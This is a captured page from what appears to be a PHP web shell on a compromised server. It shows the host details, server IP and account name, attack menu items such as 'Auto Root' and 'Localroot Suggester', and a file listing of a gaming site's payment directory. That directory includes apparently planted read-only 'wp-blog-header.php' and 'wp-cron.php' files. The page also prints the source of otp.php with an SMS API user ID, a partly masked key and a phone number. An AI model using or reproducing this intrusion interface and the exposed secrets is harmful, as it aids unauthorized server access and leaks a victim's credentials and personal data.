Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
game 61 clube /
pay /
Delete
Unzip
Name
Size
Permission
Date
Action
assets
[ DIR ]
drwxr-xr-x
2025-09-21 22:51
pay
[ DIR ]
drwxr-xr-x
2025-11-07 14:30
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
adddeposit.php
4.52
KB
-rw-r--r--
2025-09-14 18:50
checksuccesspay.php
1.9
KB
-rw-r--r--
2025-09-14 18:50
config.php
371
B
-rw-r--r--
2025-11-21 17:38
depositconfirm.php
5.85
KB
-rw-r--r--
2025-09-14 18:50
error_log
788
B
-rw-r--r--
2025-11-23 10:38
heyrtnl.php
1.56
KB
-rw-r--r--
2025-09-14 18:50
jerrylawler.php
7.68
KB
-rw-r--r--
2025-11-21 17:37
lgwebhook.php
3.69
KB
-rw-r--r--
2025-09-14 18:50
log.txt
2.84
KB
-rw-r--r--
2025-11-07 17:53
otp.php
1
KB
-rw-r--r--
2025-09-14 18:50
safepay.php
6.64
KB
-rw-r--r--
2025-09-14 18:50
spwebhook.php
3.31
KB
-rw-r--r--
2025-09-14 18:50
usdt.php
22.48
KB
-rw-r--r--
2025-11-21 17:37
usdtconfim.php
5.67
KB
-rw-r--r--
2025-09-14 18:50
usdtuu.php
22.67
KB
-rw-r--r--
2025-09-14 18:50
wepay.php
4.66
KB
-rw-r--r--
2025-09-14 18:50
wepay2.php
4.73
KB
-rw-r--r--
2025-11-21 17:37
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php function sendOtp($user, $key, $mobileNo, $timeToAlive, $message) { $url = "http://otp.xhost.co.in/generateOtp.jsp"; $params = [ "userid" => $user, "key" => $key, "mobileno" => $mobileNo, "timetoalive" => $timeToAlive, "message" => $message ]; $queryString = http_build_query($params); $response = file_get_contents("{$url}?{$queryString}"); return json_decode($response, true); } // Example Usage $user = "8847616363"; // Your user ID $key = "5044250958XX"; // Your API key $mobileNo = "+919499806040"; // Recipient's mobile number $timeToAlive = 200; // OTP validity in seconds $message = "your One Time Password is: {otp} Thank You"; // Message template $sendOtpResponse = sendOtp($user, $key, $mobileNo, $timeToAlive, $message); if ($sendOtpResponse['result'] === 'success') { echo "OTP sent successfully. OTP ID: " . $sendOtpResponse['otpId'] . "\n"; } else { echo "Failed to send OTP. Response: " . json_encode($sendOtpResponse) . "\n"; } ?>